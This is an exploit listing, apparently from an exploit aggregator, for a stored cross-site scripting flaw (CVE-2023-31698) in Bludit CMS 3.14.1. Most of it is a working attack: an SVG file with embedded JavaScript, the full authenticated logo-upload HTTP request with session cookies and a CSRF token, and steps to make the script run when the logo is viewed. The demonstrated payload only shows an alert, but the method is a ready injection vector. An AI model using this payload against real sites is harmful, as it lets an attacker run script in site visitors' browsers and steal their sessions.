Share
## https://sploitus.com/exploit?id=PACKETSTORM:172462
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)  
(Authenticated)  
# Date: 2023-04-15  
# Exploit Author: Rahad Chowdhury  
# Vendor Homepage: https://www.bludit.com/  
# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1  
# Version: 3.14.1  
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53  
# CVE: CVE-2023-31698  
  
SVG Payload  
-------------  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400  
"/>  
<script type="text/javascript">  
alert(document.domain);  
</script>  
</svg>  
  
save this SVG file xss.svg  
  
Steps to Reproduce:  
  
1. At first login your admin panel.  
2. then go to setting and click logo section.  
3. Now upload xss.svg file so your request data will be  
  
POST /bludit/admin/ajax/logo-upload HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/112.0  
Content-Type: multipart/form-data;  
boundary=---------------------------15560729415644048492005010998  
Referer: http://127.0.0.1/bludit/admin/settings  
Cookie: BLUDITREMEMBERUSERNAME=admin;  
BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;  
BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i  
Content-Length: 651  
  
-----------------------------15560729415644048492005010998  
Content-Disposition: form-data; name="tokenCSRF"  
  
626c201693546f472cdfc11bed0938aab8c6e480  
-----------------------------15560729415644048492005010998  
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400  
"/>  
<script type="text/javascript">  
alert(document.domain);  
</script>  
</svg>  
  
-----------------------------15560729415644048492005010998--  
  
4. Now open logo image link that you upload. You will see XSS pop up.